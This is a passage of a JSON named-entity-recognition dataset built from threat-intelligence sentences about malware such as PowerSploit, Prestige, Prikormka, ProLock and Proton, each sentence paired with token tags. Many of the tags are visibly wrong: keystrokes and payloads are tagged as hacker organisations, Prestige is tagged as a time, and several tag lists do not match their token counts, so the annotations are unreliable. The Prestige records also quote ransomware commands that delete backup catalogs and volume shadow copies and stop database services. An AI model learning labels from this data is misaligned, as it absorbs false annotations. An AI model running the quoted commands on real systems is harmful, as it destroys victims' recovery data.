"SID." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerDuke", "has", "commands", "to", "get", "the", "time", "the", "machine", "was", "built,", "the", "time,", "and", "the", "time", "zone." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerDuke", "runs", "<code>cmd.exe", "/c</code>", "and", "sends", "the", "output", "to", "its", "C2." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerLess", "can", "encrypt", "browser", "database", "files", "prior", "to", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerLess", "has", "a", "browser", "info", "stealer", "module", "that", "can", "read", "Chrome", "and", "Edge", "browser", "database", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "PowerLess", "has", "the", "ability", "to", "exfiltrate", "data,", "including", "Chrome", "and", "Edge", "browser", "database", "files,", "from", "compromised", "machines." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "B-Features", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerLess", "can", "use", "base64", "and", "AES", "ECB", "decryption", "prior", "to", "execution", "of", "downloaded", "modules." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerLess", "can", "use", "an", "encrypted", "channel", "for", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "PowerLess", "can", "download", "additional", "payloads", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "PowerLess", "can", "use", "a", "module", "to", "log", "keystrokes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "PowerLess", "can", "stage", "stolen", "browser", "data", "in", "`C:\\\\Windows\\\\Temp\\\\cup.tmp`", "and", "keylogger", "data", "in", "`C:\\\\Windows\\\\Temp\\\\Report.06E17A5A-7325-4325-8E5D-E172EBA7FC5BK`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerLess", "is", "written", "in", "and", "executed", "via", "PowerShell", "without", "using", "powershell.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-SamFile" ] }, { "tokens": [ "PowerPunch", "can", "use", "Base64-encoded", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "PowerPunch", "can", "use", "the", "volume", "serial", "number", "from", "a", "target", "host", "to", "generate", "a", "unique", "XOR", "key", "for", "the", "next", "stage", "payload." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerPunch", "can", "download", "payloads", "from", "adversary", "infrastructure." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "PowerPunch", "has", "the", "ability", "to", "execute", "through", "PowerShell." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PowerShower", "has", "used", "7Zip", "to", "compress", ".txt,", ".pdf,", ".xls", "or", ".doc", "files", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Org", "O", "O", "B-Way", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "PowerShower", "has", "used", "a", "PowerShell", "document", "stealer", "module", "to", "pack", "and", "exfiltrate", ".txt,", ".pdf,", ".xls", "or", ".doc", "files", "smaller", "than", "5MB", "that", "were", "modified", "during", "the", "past", "two", "days." ], "ner_tags": [ "B-Org", "O", "O", "O", "B-Way", "I-Tool", "B-SecTeam", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShower", "has", "the", "ability", "to", "remove", "all", "files", "created", "during", "the", "dropper", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "PowerShower", "has", "added", "a", "registry", "key", "so", "future", "powershell.exe", "instances", "are", "spawned", "with", "coordinates", "for", "a", "window", "position", "off-screen", "by", "default." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShower", "has", "added", "a", "registry", "key", "so", "future", "powershell.exe", "instances", "are", "spawned", "off-screen", "by", "default,", "and", "has", "removed", "all", "registry", "entries", "that", "are", "left", "behind", "during", "the", "dropper", "process." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "PowerShower", "is", "a", "backdoor", "written", "in", "PowerShell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShower", "has", "the", "ability", "to", "deploy", "a", "reconnaissance", "module", "to", "retrieve", "a", "list", "of", "the", "active", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShower", "sets", "up", "persistence", "with", "a", "Registry", "run", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShower", "has", "the", "ability", "to", "encode", "C2", "communications", "with", "base64", "encoding." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShower", "has", "collected", "system", "information", "on", "the", "infected", "host." ], "ner_tags": [ "B-Org", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShower", "has", "the", "ability", "to", "identify", "the", "current", "Windows", "domain", "of", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShower", "has", "the", "ability", "to", "identify", "the", "current", "user", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShower", "has", "the", "ability", "to", "save", "and", "execute", "VBScript." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "PowerShower", "has", "sent", "HTTP", "GET", "and", "POST", "requests", "to", "C2", "servers", "to", "send", "information", "and", "receive", "instructions." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "PowerSploit's", "<code>Invoke-TokenManipulation</code>", "Exfiltration", "module", "can", "be", "used", "to", "manipulate", "tokens." ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "PowerSploit's", "<code>Get-MicrophoneAudio</code>", "Exfiltration", "module", "can", "record", "system", "microphone", "audio." ], "ner_tags": [ "B-SamFile", "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "B-Features" ] }, { "tokens": [ "PowerSploit", "contains", "a", "collection", "of", "ScriptModification", "modules", "that", "compress", "and", "encode", "scripts", "and", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit", "has", "several", "modules", "that", "search", "the", "Windows", "Registry", "for", "stored", "credentials:", "<code>Get-UnattendedInstallFile</code>,", "<code>Get-Webconfig</code>,", "<code>Get-ApplicationHost</code>,", "<code>Get-SiteListPassword</code>,", "<code>Get-CachedGPPPassword</code>,", "and", "<code>Get-RegistryAutoLogon</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "B-SamFile", "B-Way", "O", "O" ] }, { "tokens": [ "PowerSploit", "contains", "a", "collection", "of", "Privesc-PowerUp", "modules", "that", "can", "discover", "and", "exploit", "DLL", "hijacking", "opportunities", "in", "services", "and", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit", "contains", "a", "collection", "of", "Exfiltration", "modules", "that", "can", "access", "data", "from", "local", "files,", "volumes,", "and", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "B-Features", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit", "has", "modules", "such", "as", "<code>Get-NetDomainTrust</code>", "and", "<code>Get-NetForestTrust</code>", "to", "enumerate", "domain", "and", "forest", "trusts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "I-Idus", "O" ] }, { "tokens": [ "PowerSploit", "contains", "a", "collection", "of", "CodeExecution", "modules", "that", "inject", "code", "(DLL,", "shellcode)", "into", "a", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit", "contains", "a", "collection", "of", "Exfiltration", "modules", "that", "can", "harvest", "credentials", "from", "Group", "Policy", "Preferences." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit's", "<code>Find-AVSignature</code>", "AntivirusBypass", "module", "can", "be", "used", "to", "locate", "single", "byte", "anti-virus", "signatures." ], "ner_tags": [ "B-SamFile", "B-Way", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit's", "<code>Invoke-Kerberoast</code>", "module", "can", "request", "service", "tickets", "and", "return", "crackable", "ticket", "hashes." ], "ner_tags": [ "B-SamFile", "B-SamFile", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit's", "<code>Get-Keystrokes</code>", "Exfiltration", "module", "can", "log", "keystrokes." ], "ner_tags": [ "B-SamFile", "B-Way", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "PowerSploit", "contains", "a", "collection", "of", "Exfiltration", "modules", "that", "can", "harvest", "credentials", "using", "Mimikatz." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Way" ] }, { "tokens": [ "PowerSploit's", "<code>Get-ProcessTokenGroup</code>", "Privesc-PowerUp", "module", "can", "enumerate", "all", "SIDs", "associated", "with", "its", "current", "token." ], "ner_tags": [ "B-SamFile", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit", "contains", "a", "collection", "of", "Privesc-PowerUp", "modules", "that", "can", "discover", "and", "exploit", "path", "interception", "opportunities", "in", "the", "PATH", "environment", "variable." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit", "contains", "a", "collection", "of", "Privesc-PowerUp", "modules", "that", "can", "discover", "and", "exploit", "search", "order", "hijacking", "vulnerabilities." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-OffAct", "B-Way", "O", "O" ] }, { "tokens": [ "PowerSploit", "contains", "a", "collection", "of", "Privesc-PowerUp", "modules", "that", "can", "discover", "and", "exploit", "unquoted", "path", "vulnerabilities." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit", "modules", "are", "written", "in", "and", "executed", "via", "PowerShell." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PowerSploit's", "<code>Get-ProcessTokenPrivilege</code>", "Privesc-PowerUp", "module", "can", "enumerate", "privileges", "for", "a", "given", "process." ], "ner_tags": [ "B-SamFile", "B-Way", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit", "contains", "a", "collection", "of", "Privesc-PowerUp", "modules", "that", "can", "query", "Registry", "keys", "for", "potential", "opportunities." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O" ] }, { "tokens": [ "PowerSploit", "reflectively", "loads", "a", "Windows", "PE", "file", "into", "a", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit's", "<code>New-UserPersistenceOption</code>", "Persistence", "argument", "can", "be", "used", "to", "establish", "via", "the", "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "Registry", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "PowerSploit's", "<code>New-UserPersistenceOption</code>", "Persistence", "argument", "can", "be", "used", "to", "establish", "via", "a", "Scheduled", "Task/Job." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit's", "<code>Get-TimedScreenshot</code>", "Exfiltration", "module", "can", "take", "screenshots", "at", "regular", "intervals." ], "ner_tags": [ "B-SamFile", "B-Way", "B-SamFile", "I-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "PowerSploit's", "<code>Install-SSP</code>", "Persistence", "module", "can", "be", "used", "to", "establish", "by", "installing", "a", "SSP", "DLL." ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam" ] }, { "tokens": [ "PowerSploit", "contains", "a", "collection", "of", "Exfiltration", "modules", "that", "can", "harvest", "credentials", "from", "Windows", "vault", "credential", "objects." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit's", "<code>Invoke-WmiCommand</code>", "CodeExecution", "module", "uses", "WMI", "to", "execute", "and", "retrieve", "the", "output", "from", "a", "PowerShell", "payload." ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerSploit", "contains", "a", "collection", "of", "Privesc-PowerUp", "modules", "that", "can", "discover", "and", "replace/modify", "service", "binaries,", "paths,", "and", "configs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PowerStallion", "uses", "Microsoft", "OneDrive", "as", "a", "C2", "server", "via", "a", "network", "drive", "mapped", "with", "<code>net", "use</code>." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerStallion", "uses", "a", "XOR", "cipher", "to", "encrypt", "command", "output", "written", "to", "its", "OneDrive", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "PowerStallion", "uses", "PowerShell", "loops", "to", "iteratively", "check", "for", "available", "commands", "in", "its", "OneDrive", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "PowerStallion", "has", "been", "used", "to", "monitor", "process", "lists." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "PowerStallion", "modifies", "the", "MAC", "times", "of", "its", "local", "log", "files", "to", "match", "that", "of", "the", "victim's", "desktop.ini", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Prestige", "has", "leveraged", "the", "CryptoPP", "C++", "library", "to", "encrypt", "files", "on", "target", "systems", "using", "AES", "and", "appended", "filenames", "with", "`.enc`." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Prestige", "can", "traverse", "the", "file", "system", "to", "discover", "files", "to", "encrypt", "by", "identifying", "specific", "extensions", "defined", "in", "a", "hardcoded", "list." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Prestige", "has", "been", "deployed", "using", "the", "Default", "Domain", "Group", "Policy", "Object", "from", "an", "Active", "Directory", "Domain", "Controller." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Prestige", "can", "delete", "the", "backup", "catalog", "from", "the", "target", "system", "using:", "`c:\\Windows\\System32\\wbadmin.exe", "delete", "catalog", "-quiet`", "and", "can", "also", "delete", "volume", "shadow", "copies", "using:", "`\\Windows\\System32\\vssadmin.exe", "delete", "shadows", "/all", "/quiet`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Prestige", "has", "the", "ability", "to", "register", "new", "registry", "keys", "for", "a", "new", "extension", "handler", "via", "`HKCR\\.enc`", "and", "`HKCR\\enc\\shell\\open\\command`." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Prestige", "has", "used", "the", "`Wow64DisableWow64FsRedirection()`", "and", "`Wow64RevertWow64FsRedirection()`", "functions", "to", "disable", "and", "restore", "file", "system", "redirection." ], "ner_tags": [ "B-Org", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Prestige", "can", "use", "PowerShell", "for", "payload", "execution", "on", "targeted", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Prestige", "has", "been", "executed", "on", "a", "target", "system", "through", "a", "scheduled", "task", "created", "by", "Sandworm", "Team", "using", "Impacket." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O" ] }, { "tokens": [ "Prestige", "has", "attempted", "to", "stop", "the", "MSSQL", "Windows", "service", "to", "ensure", "successful", "encryption", "using", "`C:\\Windows\\System32\\net.exe", "stop", "MSSQLSERVER`." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "collecting", "documents", "from", "removable", "media,", "Prikormka", "compresses", "the", "collected", "files,", "and", "encrypts", "it", "with", "Blowfish." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "A", "module", "in", "Prikormka", "collects", "passwords", "stored", "in", "applications", "installed", "on", "the", "victim." ], "ner_tags": [ "O", "B-SamFile", "O", "B-SamFile", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "module", "in", "Prikormka", "gathers", "logins", "and", "passwords", "stored", "in", "applications", "on", "the", "victims,", "including", "Google", "Chrome,", "Mozilla", "Firefox,", "and", "several", "other", "browsers." ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Prikormka", "uses", "DLL", "search", "order", "hijacking", "for", "persistence", "by", "saving", "itself", "as", "ntshrui.dll", "to", "the", "Windows", "directory", "so", "it", "will", "load", "before", "the", "legitimate", "ntshrui.dll", "saved", "in", "the", "System32", "subdirectory." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Prikormka", "contains", "a", "module", "that", "collects", "documents", "with", "certain", "extensions", "from", "removable", "media", "or", "fixed", "drives", "connected", "via", "USB." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "resources", "in", "Prikormka", "are", "encrypted", "with", "a", "simple", "XOR", "operation", "or", "encoded", "with", "Base64." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "encrypting", "its", "own", "log", "files,", "the", "log", "encryption", "module", "in", "Prikormka", "deletes", "the", "original,", "unencrypted", "files", "from", "the", "host." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "module", "in", "Prikormka", "collects", "information", "about", "the", "paths,", "size,", "and", "creation", "time", "of", "files", "with", "specific", "file", "extensions,", "but", "not", "the", "actual", "content", "of", "the", "file." ], "ner_tags": [ "O", "B-SamFile", "O", "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Prikormka", "contains", "a", "keylogger", "module", "that", "collects", "keystrokes", "and", "the", "titles", "of", "foreground", "windows." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Prikormka", "creates", "a", "directory,", "<code>%USERPROFILE%\\AppData\\Local\\SKC\\</code>,", "which", "is", "used", "to", "store", "collected", "log", "files." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "A", "module", "in", "Prikormka", "collects", "information", "on", "available", "printers", "and", "disk", "drives." ], "ner_tags": [ "O", "B-SamFile", "O", "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Prikormka", "adds", "itself", "to", "a", "Registry", "Run", "key", "with", "the", "name", "guidVGA", "or", "guidVSA." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Prikormka", "uses", "rundll32.exe", "to", "load", "its", "DLL." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Prikormka", "contains", "a", "module", "that", "captures", "screenshots", "of", "the", "victim's", "desktop." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "A", "module", "in", "Prikormka", "collects", "information", "from", "the", "victim", "about", "installed", "anti-virus", "software." ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Prikormka", "encodes", "C2", "traffic", "with", "Base64." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Prikormka", "encrypts", "some", "C2", "traffic", "with", "the", "Blowfish", "cipher." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "A", "module", "in", "Prikormka", "collects", "information", "from", "the", "victim", "about", "Windows", "OS", "version,", "computer", "name,", "battery", "info,", "and", "physical", "memory." ], "ner_tags": [ "O", "B-SamFile", "O", "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "module", "in", "Prikormka", "collects", "information", "from", "the", "victim", "about", "its", "IP", "addresses", "and", "MAC", "addresses." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "module", "in", "Prikormka", "collects", "information", "from", "the", "victim", "about", "the", "current", "user", "name." ], "ner_tags": [ "O", "B-SamFile", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ProLock", "can", "use", "BITS", "jobs", "to", "download", "its", "malicious", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ProLock", "can", "encrypt", "files", "on", "a", "compromised", "host", "with", "RC6,", "and", "encrypts", "the", "key", "with", "RSA-1024." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ProLock", "can", "use", "CVE-2019-0859", "to", "escalate", "privileges", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ProLock", "can", "remove", "files", "containing", "its", "payload", "after", "they", "are", "executed." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ProLock", "can", "use", "vssadmin.exe", "to", "remove", "volume", "shadow", "copies." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "ProLock", "can", "use", ".jpg", "and", ".bmp", "files", "to", "store", "its", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ProLock", "can", "use", "WMIC", "to", "execute", "scripts", "on", "targeted", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proton", "zips", "up", "files", "before", "exfiltrating", "them." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proton", "removes", "logs", "from", "<code>/var/logs</code>", "and", "<code>/Library/logs</code>." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proton", "gathers", "credentials", "for", "Google", "Chrome." ], "ner_tags": [ "B-Idus", "B-SamFile", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Proton", "uses", "an", "encrypted", "file", "to", "store", "commands", "and", "configuration", "values." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proton", "kills", "security", "tools", "like", "Wireshark", "that", "are", "running." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Proton", "removes", "all", "files", "in", "the", "/tmp", "directory." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Proton", "prompts", "users", "for", "their", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Proton", "gathers", "credentials", "in", "files", "for", "keychains." ], "ner_tags": [ "B-Idus", "B-SamFile", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Proton", "uses", "a", "keylogger", "to", "capture", "keystrokes." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "Proton", "persists", "via", "Launch", "Agent." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "O" 